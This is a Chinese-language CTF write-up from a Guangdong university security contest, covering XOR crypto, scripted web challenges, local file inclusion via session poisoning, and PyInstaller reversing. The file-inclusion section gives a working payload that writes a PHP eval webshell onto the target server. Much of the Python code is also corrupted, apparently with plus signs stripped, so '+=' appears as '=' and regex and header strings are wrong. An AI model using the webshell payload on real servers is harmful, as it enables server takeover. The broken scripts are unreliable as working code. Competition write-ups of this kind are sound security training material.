第二届广东大学生网络安全攻防大赛 个人向Write Up
Crypto
crypto-xor2
拿到task.py 和 flag加密后的cipher winhex打开 推测hex值为异或结果 taskpy源码 加密方式为flag对key逐位异或循环 并标注了xxxx并非真实key
from secret import flag key = "xxxx" # not real key cipher = "" for i, c in enumerate(flag): cipher = chr(ord(c) ^ ord(key[i%4])) with open("cipher", "w") as f: f.write(cipher) flag{xxx}前四位为f l a g,依次对cipher前四位做异或处理,得到key,可以看出xxxx就是key内容(烟雾弹是吗)
写一个脚本逆向,得到
key = "xxxx" # not real key f = open('cipher') cipher = f.read() f.close() def jiemi(cipher): flag = '' for i, c in enumerate(cipher): flag = chr(ord(c) ^ ord(key[i % 4])) print(flag) //flag{fccb0665-bce5-d329-aca7-99179bdc9ed3} jiemi(cipher) Web
easy_ctf
requests抓取页面,排序字符,然后POST回去,带上header使python使用之前的cookie,排序脚本网上找了一个用
# -*- coding:utf-8 -*- import requests import re def paixu(str): ///按出现频率从大到小排序 与题目相反 dic = {} count = 0 s = str flag = '' for i in s: dic[i] = s.count(i) list = sorted(dic.items(), key=lambda d: d[1], reverse=True) for i, j in list: flag = i print(i, end="") count = 1 return flag url = 'http://120.79.191.238:41227/' header = { 'POST':'/ HTTP/1.1', 'Host':'http://120.79.191.238:41227/', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0', 'Accept': 'text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length':'5', 'Origin': 'http://120.79.191.238:41227/', 'Referer': 'http://120.79.191.238:41227/', 'Cookie': 'PHPSESSID=0do0gj80dg24120ctdblthjdm7', 'Upgrade-Insecure-Requests':'1' } cookie = { 'PHPSESSID':'0do0gj80dg24120ctdblthjdm7' } value = '1' data = { 'ans':value } r = requests.session() post = r.post(url,headers=header,cookies=cookie,data=data) ///随意传值获取html内容 html = post.text html = re.findall("\n(. ?)<td",html) ///提取字符串 re默认提取为数组 paixuv = ''.join(html) ///转换字符串 print(paixuv) value = paixu(paixuv) //使用排序方法 print(value) l = list(value) l.reverse() value = ''.join(l) //字符串转换为数组,然后反向,转换回字符串(相当于反向字符串) data = { 'ans':value } post = r.post(url,headers=header,cookies=cookie,data=data) print(post.text) in
进到actionphp页面 参数file=2.txt 文件包含 利用伪协议filter读取index与action源码
$_POST name 会被写到session里 尝试读一下session位置
读出来,然后往name值注入PHP 代码 就会被include视为php执行 payload:name=<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?> 回包username|s:68:“”; http测试一下shell.php 成功传马 蚁剑连接 在目录下找到flag文件
Reverse
pyre
只给了一个pyre.exe 图标看起来像pyinstaller打包的 检查是否需要使用 pyinstxtractor.py 来逆向为pyc文件 python .\pyinstxtractor.py .\pyre.exe 执行后多出一个目录 目录下1可以看到.pyc就是原文件 但是无法反编译 试着修头,将struct.pyc前16个字节覆盖1.pyc的前十六个字节 修复1pyc的头部 然后放入在线反编译网站进行源码编译
def check(): a = input('plz input your flag:') c = [ 144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8] if len(a) != 42: print('wrong length') return 0 b = None for i in range(len(a)): if ord(a[i]) * 33 % b != c[i]: print('wrong') return None print('win') check() b未知,先爆b。
#ord('f') *33 % b = 114 flag = 'flag' for b in range(1,4125): if((ord('f') * 33) % b == 144): if((ord('l') * 33) % b == 163): if ((ord('a') * 33) % b == 158): if ((ord('g') * 33) % b == 177): print(b) //179 逆向取余,爆破脚本
c = [ 144, 163, 158 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
78, 171, 12, 53, 105, 45,
12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
b = 179
for i in range(len(c)):
for d in range(1,24): //ord('}')=125,125*33 / 179 = 23 得到最大爆破次数
if((b*d + c[i]) % 33 == 0):
print(chr((b*d + c[i]) // 33),end='') //flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}